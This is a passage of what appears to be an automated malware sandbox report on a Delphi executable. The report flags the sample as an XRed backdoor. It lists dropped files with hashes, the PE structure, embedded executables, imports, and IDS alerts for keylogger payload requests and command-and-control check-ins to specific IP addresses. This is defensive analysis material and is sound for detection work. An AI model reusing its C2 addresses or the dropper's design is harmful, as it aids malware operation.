Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\CZQKSDDMWR\~$UNKRLCVOHV.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.7769794087092887
Encrypted:	false
SSDEEP:	3:iXKG/4N+RMlW8td:iXlMlW8/
MD5:	37BD8218D560948827D3B948CAFA579C
SHA1:	24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
SHA-256:	189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
SHA-512:	A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
Malicious:	false
Preview:	.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\CZQKSDDMWR\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.627300361046806
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Irr:ansJ39LyjbJkQFMhmC+6GD9I
MD5:	9DA1B61462418FA0389F2FAA306F6C1E
SHA1:	07A25F0CE68DCF75E423486CAE62ED10609E52B1
SHA-256:	EB005F71853E78D3558F2E62E2EED329D9EF88001CD94143D8DFD0E0371667C0
SHA-512:	3C2B6C26DAA5CB356FF29DEB815C4D5DA081BADF6C35502928BC4BEF8C6D6C0F3EC370E2775E836E1D366B6B9F785E81300F12CF349E9932479B37E90472C1F4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416714693786241
Encrypted:	false
SSDEEP:	6144:vcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNQ5+:Ui58oSWIZBk2MM6AFBWo
MD5:	6B0E051A7F7F18471826E15357E5F8A2
SHA1:	AE4FE021EDD05FF68D4FB5D20F96DED8BDEA35F5
SHA-256:	FAB0C30B6ADC51C982C2174294F005D8D719073CAF0093844FAB449E630B464C
SHA-512:	461EB3A471B7F68D0E426DBF0F1F54C5E00811110F0700704E8BBB5BF160A4EBA98B0E59C265FB5EDE5A3F973C1323E9F47550E03559CB35A27C762BDA23E4F0
Malicious:	false
Preview:	regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmr.g.Z..............................................................................................................................................................................................................................................................................................................................................`Fp.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.433252569170028
TrID:	Win32 Executable (generic) a (10002005/4) 93.09% Win32 Executable Borland Delphi 7 (665061/41) 6.19% UPX compressed Win32 Executable (30571/9) 0.28% Win32 EXE Yoda's Crypter (26571/9) 0.25% Win32 Executable Delphi generic (14689/80) 0.14%
File name:	VKKDXE.exe
File size:	1'687'552 bytes
MD5:	31ba582dde7c48214dfc929a8c5d5662
SHA1:	39497422641176cb4b6f8828b43805cbd1258d53
SHA256:	35f873a09d5330e0c8c0e0bdabac9640e606ac7955b6e2082d9d1ca3d9880492
SHA512:	1357ffa717079a422ac2510f010722ec464c1f595fbba3a1df847ff3370f30d5b6adb393f846838c565de7b669c6e0968236c6ed8ce079da3281531373aa849e
SSDEEP:	24576:snsJ39LyjbJkQFMhmC+6GD9ChloDX0XOf4f/mlhxQfnmrAL4bHpZlF:snsHyjtk2MYC5GD4hloJfY/mlT/rLL
TLSH:	2875E133F2D19437E1321A3C9C9B9794582ABE512D347A4E77F82E4CAE3E64138642D7
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0c9e1f9b5a3b264d

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007F5280ACED2Dh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F5280B22675h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007F5280B22274h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007F5280B22664h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F5280B226D8h
call 00007F5280ACC80Bh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xf1730	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xf1730	0xf1800	1e392b2d182f61d9639f51316c34fca7	False	0.8926236170419255	data	7.727446058748048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.1346153846153846
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xdfa00	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed			0.9243041241615427
RT_RCDATA	0x198814	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0x198818	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0x19c418	0x64c	data			0.5998759305210918
RT_RCDATA	0x19ca64	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0x19cbb8	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0x1a138c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1a13a0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1a13b4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a13c8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a13dc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a13f0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a1404	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x1a1418	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0x1a142c	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50009	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49845	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50069	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	50096	172.111.138.100	5552	TCP
2024-12-30T11:41:11.630771+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49945	172.111.138.100	5552	TCP
2024-12-30T11:41:24.811742+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49707	172.217.18.110	443	TCP
2024-12-30T11:41:24.813833+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49706	172.217.18.110	443	TCP
2024-12-30T11:41:25.102136+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.7	49714	69.42.215.252	80	TCP
2024-12-30T11:41:25.802690+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49716	172.217.18.110	443	TCP
2024-12-30T11:41:25.807241+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49717	172.217.18.110	443	TCP
2024-12-30T11:41:26.416068+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:41:26.416068+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.7	49737	172.111.138.100	5552	TCP
2024-12-30T11:41:26.795489+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49727	172.217.18.110	443	TCP
2024-12-30T11:41:26.795820+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49728	172.217.18.110	443	TCP
2024-12-30T11:41:28.053818+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49745	172.217.18.110	443	TCP
2024-12-30T11:41:28.076708+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49744	172.217.18.110	443	TCP
2024-12-30T11:41:30.021889+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49768	172.217.18.110	443	TCP
2024-12-30T11:41:30.030287+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49767	172.217.18.110	443	TCP
2024-12-30T11:41:31.002652+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49785	172.217.18.110	443	TCP
2024-12-30T11:41:31.004194+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49782	172.217.18.110	443	TCP
2024-12-30T11:41:31.972449+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49792	172.217.18.110	443	TCP
2024-12-30T11:41:32.012902+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49791	172.217.18.110	443	TCP
2024-12-30T11:41:32.832560+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49807	172.217.18.110	443	TCP
2024-12-30T11:41:32.832600+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49802	172.217.18.110	443	TCP
2024-12-30T11:41:33.986444+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49818	172.217.18.110	443	TCP
2024-12-30T11:41:33.992049+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49819	172.217.18.110	443	TCP
2024-12-30T11:41:34.970696+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49828	172.217.18.110	443	TCP
2024-12-30T11:41:35.061571+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.7	49826	172.217.18.110	443	TCP
